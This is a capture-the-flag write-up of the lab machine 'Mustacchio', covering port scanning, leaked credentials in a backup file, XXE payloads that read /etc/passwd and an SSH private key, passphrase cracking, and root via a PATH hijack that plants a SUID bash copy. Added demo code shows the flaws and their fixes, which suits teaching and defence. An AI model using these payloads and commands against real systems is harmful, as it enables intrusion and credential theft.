Port scanning

nmap --min-rate=10000 -p- 10.10.155.198
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 08:34 UTC
Nmap scan report for ip-10-10-240-97.eu-west-1.compute.internal (10.10.155.198)
Host is up (0.0038s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-http
MAC Address: 02:3D:37:D2:CB:0F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds

nmap -sC -sT -sV -O -p22,80,8765 10.10.155.198
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 08:35 UTC
Nmap scan report for ip-10-10-240-97.eu-west-1.compute.internal (10.10.155.198)
Host is up (0.00038s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
| 256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_ 256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 02:3D:37:D2:CB:0F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (97%), Crestron XPanel control system (90%), Linux 5.4 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.40 seconds

Getting a shell

Port 80 is just a static portal site with no visible functionality, so brute-force directories and file extensions:

feroxbuster -u http://10.10.155.198/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,jsp,php,html,bak

This turns up http://10.10.155.198/custom/js/users.bak. The file is a SQLite database, so rename it accordingly:

mv users.bak users.sqlite3

Opening it with sqlite3 yields a credential pair:

admin:bulldog19

Those credentials log in successfully on the port 8765 login page. The page source contains a comment.

It also references /auth/dontforget.bak, which can be downloaded and inspected: it is an XML file.

The page submits a POST form with a single field named xml. The room hint points at XXE, so take a payload from PayloadsAllTheThings:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
<com>&xxe;</com>
</comment>

The file contents are echoed back in the response, so this is an in-band XXE. /etc/passwd shows a user barry; next, try to pull his SSH private key:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<com>&xxe;</com>
</comment>
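To see why that DTD works, here is an added example (not code from the room or from this writeup) that reproduces the server side with Python's xml.sax: the same payload shape is parsed once with external general entities enabled (the vulnerable configuration, and the default before Python 3.7.1) and once with them disabled (the fix). The secret file, its contents, and the function names are constructed for the demo; the real target files were /etc/passwd and /home/barry/.ssh/id_rsa.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a sensitive file on the target (not a real passwd).
SECRET_CONTENT = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "barry:x:1003:1003::/home/barry:/bin/bash\n"
)


def write_secret_file():
    """Create the file the attacker will read through the external entity."""
    fd, path = tempfile.mkstemp(prefix="xxe_demo_", suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(SECRET_CONTENT)
    return path


def build_payload(target_path):
    """Same shape as the PayloadsAllTheThings payload used above.

    The internal DTD subset declares an *external general entity* `xxe`
    whose replacement text is fetched from its SYSTEM identifier (a
    file:// URL here).  A parser that resolves external entities pastes
    the file contents wherever &xxe; appears in the document body.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY >\n"
        f'<!ENTITY xxe SYSTEM "file://{target_path}" >]>\n'
        "<comment>\n"
        "<com>&xxe;</com>\n"
        "</comment>\n"
    ).encode()


class ComHandler(ContentHandler):
    """Collects the text inside <com>, like an app that echoes the comment back."""

    def __init__(self):
        super().__init__()
        self._in_com = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "com":
            self._in_com = True

    def endElement(self, name):
        if name == "com":
            self._in_com = False

    def characters(self, content):
        if self._in_com:
            self.parts.append(content)


def parse_comment(xml_bytes, resolve_external_entities):
    """Parse the submitted XML and return the text of <com>.

    resolve_external_entities=True reproduces the vulnerable setup; False is
    the hardened setting (and the Python >= 3.7.1 default).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = ComHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def demo():
    """Return (text from vulnerable parser, text from hardened parser)."""
    path = write_secret_file()
    try:
        payload = build_payload(path)
        leaked = parse_comment(payload, resolve_external_entities=True)
        hardened = parse_comment(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser echoed:\n" + leaked)
    print("hardened parser echoed: %r" % hardened)
```

The hardened parser simply skips the unresolved entity, so `<com>` comes back empty instead of carrying the file. The same rule applies to any XML stack: disable external entity (and DTD) resolution on the parser the upload handler uses, rather than trying to filter the payload.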

Save the key locally, restrict its permissions (chmod 600, or ssh refuses it) and try to connect; the key turns out to be passphrase-protected, so crack it:

ssh2john key > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames (key)
1g 0:00:00:00 DONE (2024-03-18 11:54) 1.250g/s 3713Kp/s 3713Kc/s 3713KC/s urieljr.k..urielfabricio07
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Privilege escalation

joe's home directory contains /home/joe/live_log with the SUID bit set. Decompiled in IDA, its main() is:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Decompiled main() of /home/joe/live_log (SUID root binary) */
int main(void)
{
    setuid(0);
    setgid(0);
    printf("Live Nginx Log Reader");
    /* "tail" is unqualified: system() runs it through /bin/sh, which
       resolves the name via the caller's PATH */
    return system("tail -f /var/log/nginx/access.log");
}

tail is invoked by bare name rather than absolute path, so the shell spawned by system() looks it up through our PATH. Plant a fake tail and put its directory first:

cd /tmp
echo 'cp /bin/bash /tmp/rootbash ;chmod +xs /tmp/rootbash' >tail
chmod +x tail
export PATH=/tmp:$PATH

Run live_log again and the fake tail executes as root, leaving a SUID copy of bash in /tmp/rootbash. Start it with /tmp/rootbash -p (without -p, bash drops the effective uid back to the real one) and we are root!
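The same mechanism and its fix, as an added example that is not part of the writeup: a throwaway directory stands in for /tmp, a constructed log line for /var/log/nginx/access.log, and a marker-printing script for the cp/chmod one-liner, so it runs without SUID or root. The function names (victim_unqualified, victim_hardened, plant_fake_tail, run_with_hijacked_path) are my own.

```shell
#!/bin/sh
# Added example: PATH hijack of an unqualified "tail" and the hardened form.
set -eu

WORK=$(mktemp -d "${TMPDIR:-/tmp}/hijack.XXXXXX")
trap 'rm -rf "$WORK"' EXIT
LOG="$WORK/access.log"
# Constructed stand-in for /var/log/nginx/access.log
printf '10.0.0.5 - - "GET /auth/login HTTP/1.1" 200\n' > "$LOG"

# Absolute path of the real tail, captured while PATH is still trustworthy.
REAL_TAIL=$(command -v tail)

# Stand-in for live_log's system("tail -f /var/log/nginx/access.log"):
# system() hands the string to /bin/sh, which resolves the bare "tail"
# through whatever PATH the caller exported. (-n1 instead of -f so it returns.)
victim_unqualified() {
    sh -c "tail -n1 '$LOG'"
}

# Hardened variant: absolute binary path plus a PATH chosen by the program
# itself, so nothing in the caller's environment influences what runs.
victim_hardened() {
    env PATH=/usr/bin:/bin sh -c "'$REAL_TAIL' -n1 '$LOG'"
}

# Attacker-controlled "tail" dropped into a writable directory; it prints a
# marker where the writeup's version copies bash and sets the SUID bit.
plant_fake_tail() {
    printf '#!/bin/sh\necho HIJACKED\n' > "$WORK/tail"
    chmod +x "$WORK/tail"
}

# Run a victim with the attacker's directory prepended to PATH (the
# `export PATH=/tmp:$PATH` step), in a subshell so our own PATH is untouched.
run_with_hijacked_path() {
    ( PATH="$WORK:$PATH"; export PATH; "$1" )
}

plant_fake_tail
echo "unqualified tail under hijacked PATH: $(run_with_hijacked_path victim_unqualified)"
echo "hardened tail under hijacked PATH:    $(run_with_hijacked_path victim_hardened)"
```

The fix is the same for the real binary: call /usr/bin/tail by absolute path (or execve it directly instead of going through system()), and reset PATH and the rest of the environment before anything runs with elevated privileges.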

Odds and ends

This was my first time running into XXE. Although I only copied a payload, it seems I should learn about DTDs in XML; I'll look into it when I have time.